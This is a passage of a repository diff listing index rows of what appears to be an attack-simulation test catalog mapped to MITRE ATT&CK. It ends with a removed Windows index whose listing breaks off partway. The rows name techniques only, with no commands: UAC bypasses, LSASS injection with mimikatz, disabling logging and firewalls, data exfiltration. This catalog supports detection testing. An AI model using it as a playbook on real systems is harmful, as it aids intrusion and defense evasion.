163 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
164 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
165 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
166 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
167 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
168 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
169 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
170 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
171 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
172 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
173 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
174 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
175 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
176 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
177 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
178 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
179 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
180 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
181 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
182 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
183 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
184 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
185 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
186 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
187 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
188 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
189 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
190 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
191 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
192 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
193 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
194 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
195 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
196 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
197 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
198 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
199 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
200 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
201 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
202 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
203 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
204 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
205 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
206 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
207 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
208 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
atomics/Indexes/Indexes-CSV/office-365-index.csv
-1
View File
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
atomics/Indexes/Indexes-CSV/windows-index.csv
-1051
View File
@@ -1,1051 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
